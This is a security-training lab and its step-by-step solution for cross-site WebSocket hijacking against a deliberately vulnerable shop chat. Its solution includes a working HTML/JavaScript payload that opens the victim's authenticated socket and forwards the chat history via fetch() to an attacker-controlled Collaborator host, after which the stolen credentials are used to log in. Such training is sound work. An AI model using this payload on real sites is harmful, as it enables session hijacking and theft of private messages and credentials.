Lab: Cross-site WebSocket hijacking

PRACTITIONER

This online shop has a live chat feature implemented using WebSockets.

To solve the lab, use the exploit server to host an HTML/JavaScript payload that uses a cross-site WebSocket hijacking attack to exfiltrate the victim's chat history, then use this to gain access to their account.

Note

To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use the provided exploit server and/or Burp Collaborator's default public server.

Solution

  1. Click "Live chat" and send a chat message.
  2. Reload the page.
  3. In Burp Proxy, in the WebSockets history tab, observe that the "READY" command retrieves past chat messages from the server.
  4. In Burp Proxy, in the HTTP history tab, find the WebSocket handshake request. Observe that the request has no CSRF tokens, but does carry the session cookie. The browser attaches that cookie to the handshake no matter which site opens the socket, so any page the victim visits can open an authenticated chat connection on their behalf.
  5. Right-click on the handshake request and select "Copy URL".
  6. In the browser, go to the exploit server and paste the following template into the "Body" section:

    <script>
        // Open the chat socket from the attacker's page; the victim's browser attaches their session cookie.
        var ws = new WebSocket('wss://your-websocket-url');
        ws.onopen = function() {
            // Same command the real chat page sends to retrieve the message history.
            ws.send("READY");
        };
        ws.onmessage = function(event) {
            // Forward every message the server sends to the attacker-controlled Collaborator host.
            fetch('https://your-collaborator-url', {method: 'POST', mode: 'no-cors', body: event.data});
        };
    </script>
  7. Replace your-websocket-url with the URL from the WebSocket handshake (YOUR-LAB-ID.web-security-academy.net/chat). Make sure you change the protocol from https:// to wss://, so that the final URL is wss://YOUR-LAB-ID.web-security-academy.net/chat. Replace your-collaborator-url with a payload generated by Burp Collaborator.
  8. Click "View exploit".
  9. Poll for interactions in the Collaborator tab. Verify that the attack has successfully retrieved your chat history and exfiltrated it via Burp Collaborator. For every message in the chat, Burp Collaborator has received an HTTP request. The request body contains the full contents of the chat message in JSON format. Note that these messages may not be received in the correct order, because each message triggers its own fetch request and those requests complete independently.
  10. Go back to the exploit server and deliver the exploit to the victim.
  11. Poll for interactions in the Collaborator tab again. Observe that you've received more HTTP interactions containing the victim's chat history. Examine the messages and notice that one of them contains the victim's username and password.
  12. Use the exfiltrated credentials to log in to the victim user's account.

Community solutions

Jarno Timmermans
Michael Sommer (no audio)